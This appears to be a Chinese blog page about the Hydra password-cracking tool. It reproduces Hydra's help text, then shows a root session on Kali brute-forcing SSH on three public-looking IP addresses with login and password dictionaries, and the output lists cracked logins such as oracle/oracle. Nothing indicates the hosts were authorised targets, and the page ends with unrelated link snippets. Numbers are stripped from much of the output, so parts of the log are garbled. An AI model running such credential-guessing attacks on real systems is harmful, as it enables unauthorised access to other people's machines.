Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [service://server[:PORT][/OPT]]

Options:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.

Example: hydra -l user -P passlist.txt ftp://192.168.0.1

# 待破解的主机列表
root@kali:~# cat serverlist 
189.37.178.1

189.37.178.216

189.37.178.98
# 破解主机的ssh用户名密码
root@kali:~# hydra -L ssh_user.dic -P ssh_pass.dic -t  -vV -o ./output.txt -e ns -M serverlist ssh
Hydra v8. (c)  by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-06 23:33:06

[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have  seconds to abort...

[DATA] max  tasks per  servers, overall  tasks,  login tries (l:/p:), ~ tries per task

[DATA] attacking service ssh on port

[VERBOSE] Resolving addresses ... done

[INFO] Testing if password authentication is supported by ssh://189.37.178.47:22

[INFO] Successful, password authentication is supported by ssh://189.37.178.47:22

[INFO] Testing if password authentication is supported by ssh://189.37.178.216:22

[INFO] Successful, password authentication is supported by ssh://189.37.178.216:22

[INFO] Testing if password authentication is supported by ssh://189.37.178.98:22

[INFO] Successful, password authentication is supported by ssh://189.37.178.98:22

[ATTEMPT] target 189.37.178.1 - login "root" - pass "root" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "root" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "root" - pass "root" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "root" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "root" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "" -  of  [child ]

[][ssh] host:189.37.178.98   login: root

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "admin" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "admin" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "admin" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "pentest" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "pentest" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "oracle123" -  of  [child ]

[][ssh] host:189.37.178.1   login: pentest   password:

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" -  of  [child ]

[STATUS] attack finished for189.37.178. (waiting for children to complete tests)

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "pentest" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" -  of  [child ]

[STATUS] attack finished for189.37.178. (waiting for children to complete tests)

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "" -  of  [child ]

[][ssh] host:189.37.178.216   login: oracle   password: oracle

[STATUS] attack finished for189.37.178. (waiting for children to complete tests)

 of  targets successfully completed,  valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-06 23:33:41
# 查看output.txt即可查看已破解成功的列表

root@kali:~# cat output.txt

# Hydra v8. run at -- :: on serverlist ssh (hydra -L ssh_user.dic -P ssh_pass.dic -t  -vV -o ./output.txt -e ns -M serverlist ssh)

[][ssh] host: 189.37.178.98   login: root

[][ssh] host: 189.37.178.1   login: pentest   password:

[][ssh] host: 189.37.178.216   login: oracle   password: oracle

安全工具-Hydra的更多相关文章

  1. 路由器密码破解工具 Hydra 7.5

    之前只在 Browser 中保存了路由管理密码,无奈升级时管理的密码丢失了,又不想重新设置,所以尝试破解登录密码. 使用破解工具 Hydra 7.5. # hydra -l username -x : ...

  2. Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用

    Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用 hydra可以破解: http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco a ...

  3. 暴力破解工具hydra与Medusa

    ---恢复内容开始--- 暴力破解工具hydra与Medusa 内容 (一)hadry (二)Medusa (一)hydra 选项 -l LOGIN 指定破解的用户名称,对特定用户破解. -L FIL ...

  4. (总结)Linux下的暴力密码在线破解工具Hydra详解

    (总结)Linux下的暴力密码在线破解工具Hydra详解 学习了:https://blog.csdn.net/yafeichang/article/details/53502869

  5. 初试在线破解工具Hydra爆破3389服务器

    hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,是著名黑客组织thc开发的. 在Kali Linux下已经是默认安装的,于是测试爆破一下自己的一台VM虚拟机服务器.hydra还支持G ...

  6. Linux下暴力破解工具Hydra详解

    一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...

  7. [转]Linux下的暴力密码破解工具Hydra详解

    摘自:http://linzhibin824.blog.163.com/blog/static/735577102013144223127/ 这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破 ...

  8. linux下暴力破解工具hydra【转】

    一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...

  9. linux暴力密码破解工具hydra安装与使用

    说明:hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码.官网:http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco ...

  10. Kali中密码暴力破解工具hydra的使用

    前言 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解.密码能否破解,在于字典是否强大.本文仅从安全角度去讲解工具的使用,请 ...

随机推荐

  1. BZOJ-2-4870: [Shoi2017]组合数问题 矩阵优化 DP

    就 是 要 我 们 从  n k  件 物 品 里 面 选 出 若 干 件,使 得 其 数 量 模 k 等 于 r 的 方 案 数 . dp方程 f [ i , j ] 表示前 i 件物品拿了若干件使 ...

  2. sudo passwd root输入普通用户密码后显示用户不再sudoers文件中

    在写上一篇VirtualBox创建共享文件夹的时候,在运行下图授权时,root密码一直输入错误 然后我就在终端输入 su root,却发现需要密码,但我却不知道密码是什么 于是我就在终端输入如下命令, ...

  3. 表单提交和ajax提交数据的请求区别

    在http请求中,我们通常会看到请求字段以query string parameters,或form data,或request payload形式发送到服务器,究竟他们有什么区别呢?下面为您揭晓答案 ...

  4. CodeForces - 1089G

    题目链接: http://codeforces.com/contest/1089/problem/G Example input Copy 3 2 0 1 0 0 0 0 0 100000000 1 ...

  5. Java代码优化小结(一)

    (1)尽量指定类.方法的final修饰符 带有final修饰符的类是不可派生的.在Java核心API中,有许多应用final的例子,例如java.lang.String,整个类都是final的.为类指 ...

  6. C++学习笔记55:流类库与输入输出

    I/O流的概念及流类库的结构 程序与外界环境的信息交换 当程序与外界环境进行信息交换时,存在着两个对象:程序中的对象,文件对象. 流是一种抽象,负责在数据的生产者和数据的消费者之间建立联系,并管理数据 ...

  7. Yii2 DetailView小部件

    DetailView小部件 Yii 提供了一套数据库小部件 widgets,这些小部件可以用于显示数据 DetailView 小部件用于显示一条记录数据 ListView 和 GridView 可以用 ...

  8. Linux安装gcc时碰到的有关问题解决(解决gcc依赖有关问题)

    Linux安装gcc时碰到的有关问题解决(解决gcc依赖有关问题) rpm安装gcc时碰到的有关问题解决(解决gcc依赖有关问题) 提示:error: Failed dependencies: clo ...

  9. Vue(五)模板

    模板 1. 简介 Vue.js使用基于HTML的模板语法,可以将DOM绑定到Vue实例中的数据 模板就是{{}},用来进行数据绑定,显示在页面中 也称为Mustache语法 2. 数据绑定的方式 a. ...

  10. domReady

    function myReady(fn){ //对于现代浏览器,对DOMContentLoaded事件的处理采用标准的事件绑定方式 if ( document.addEventListener ) { ...